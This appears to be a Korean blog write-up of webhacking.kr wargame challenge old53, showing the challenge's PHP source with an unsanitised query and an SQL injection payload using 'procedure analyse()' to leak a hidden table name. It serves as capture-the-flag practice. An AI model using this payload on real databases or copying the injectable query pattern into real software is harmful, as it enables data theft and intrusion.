webhacking.kr - old53

2021. 4. 7. 10:16WarGame/webhaking.kr

처음에 접속하면 소스코드 하나만 확인할 수 있습니다.

<?php
  include "../../config.php";
  if($_GET['view_source']) view_source();
?>
<html>
<head>
<title>Challenge 53</title>
</head>
<body>
<?php
  $db = dbconnect();
  include "./tablename.php";
  if($_GET['answer'] == $hidden_table) solve(53);
  if(preg_match("/select|by/i",$_GET['val'])) exit("no hack");
  $result = mysqli_fetch_array(mysqli_query($db,"select a from $hidden_table where a={$_GET['val']}"));
  echo($result[0]);
?>
<hr><a href=./?view_source=1>view-source</a>
</body>
</html>

 

소스코드를 보면 숨겨져있는 테이블명이 하나 있는것 같은데 이것을 알아내기 위해서

 

> procedure analyse(); 함수를 활용하면 됩니다.

 

val 인자에 쿼리를 1  procedure analyse(); 를 넣어주면 됩니다.

 

?val=1%20%20procedure%20analyse();

 

위와 같이 쿼리를 넣어주면

 

 

테이블 명을 뱉고, 테이블 명을 answer 인자에 넣어주면 풀 수 있습니다.

 

 

'WarGame > webhaking.kr' 카테고리의 다른 글

webhacking.kr - old52  (0) 2021.04.10
webhacking.kr - old60  (0) 2021.04.07
webhacking.kr - old35  (0) 2021.04.06
webhacking.kr - old8  (0) 2021.04.04
webhacking.kr - old49  (0) 2021.04.03